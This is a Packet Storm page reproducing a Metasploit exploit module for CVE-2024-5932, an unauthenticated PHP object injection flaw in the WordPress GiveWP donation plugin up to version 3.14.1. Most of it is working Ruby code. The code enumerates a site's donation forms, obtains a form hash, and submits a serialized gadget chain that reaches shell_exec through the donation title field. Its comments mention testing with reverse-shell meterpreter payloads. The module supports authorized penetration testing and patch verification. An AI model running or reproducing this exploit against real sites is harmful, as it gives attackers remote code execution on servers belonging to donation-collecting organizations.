exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution

WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution
Posted Aug 29, 2024
Authored by Julien Ahrens, Valentin Lobstein, EQSTSeminar, Villu Orav | Site metasploit.com

The GiveWP Donation plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP object injection (POI) flaw granting an unauthenticated attacker arbitrary code execution.

tags | exploit, arbitrary, php, code execution
advisories | CVE-2024-5932
SHA-256 | e3b0f075dd3c67bb401766241b1a40088cf8f52a33b79fe6c2ea5b667c1296f2

WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'GiveWP Unauthenticated Donation Process Exploit',
'Description' => %q{
The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.
},

'License' => MSF_LICENSE,
'Author' => [
'Villu Orav', # Initial Discovery
'EQSTSeminar', # Proof of Concept
'Julien Ahrens', # Vulnerability Analysis
'Valentin Lobstein' # Metasploit Module
],
'References' => [
['CVE', '2024-5932'],
['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],
['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],
['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']
],
'DisclosureDate' => '2024-08-25',
'Platform' => %w[unix linux win],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
end

def check
return CheckCode::Unknown unless wordpress_and_online?

print_status("WordPress Version: #{wordpress_version}") if wordpress_version
check_code = check_plugin_version_from_readme('give', '3.14.2')
return CheckCode::Safe unless check_code.code == 'appears'

print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")
CheckCode::Appears
end

def exploit
forms = fetch_form_list
fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?

selected_form = forms.sample
valid_form = retrieve_and_analyze_form(selected_form['id'])

return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form

print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")
send_exploit_request(
valid_form['give_form_id'],
valid_form['give_form_hash'],
valid_form['give_price_id'],
valid_form['give_amount']
)
end

def fetch_form_list
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
'data' => 'action=give_form_search'
)

return print_error('Failed to retrieve form list.') unless res&.code == 200

forms = JSON.parse(res.body)
form_ids = forms.map { |form| form['id'] }.sort

print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")
forms
end

def retrieve_and_analyze_form(form_id)
form_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }
)

return unless form_res&.code == 200

form_data = JSON.parse(form_res.body)
give_form_id = form_id
give_form_hash = form_data['data']
give_price_id = '0'
give_amount = '$10.00'
# Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.

return unless give_form_hash

{
'give_form_id' => give_form_id,
'give_form_hash' => give_form_hash,
'give_price_id' => give_price_id,
'give_amount' => give_amount
}
end

def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)
final_payload = format(
'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \
'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \
's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \
'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \
's:10:"shell_exec";s:12:"\\0*\\0generator";' \
'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \
's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \
's:13:"\\0*\\0maxRetries";i:10;}}}}}}',
length: payload.encoded.length,
encoded: payload.encoded
)

data = {
'give-form-id' => give_form_id,
'give-form-hash' => give_form_hash,
'give-price-id' => give_price_id,
'give-amount' => give_amount,
'give_first' => Faker::Name.first_name,
'give_last' => Faker::Name.last_name,
'give_email' => Faker::Internet.email,
'give_title' => final_payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
}

send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
'data' => URI.encode_www_form(data)
}, 0)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close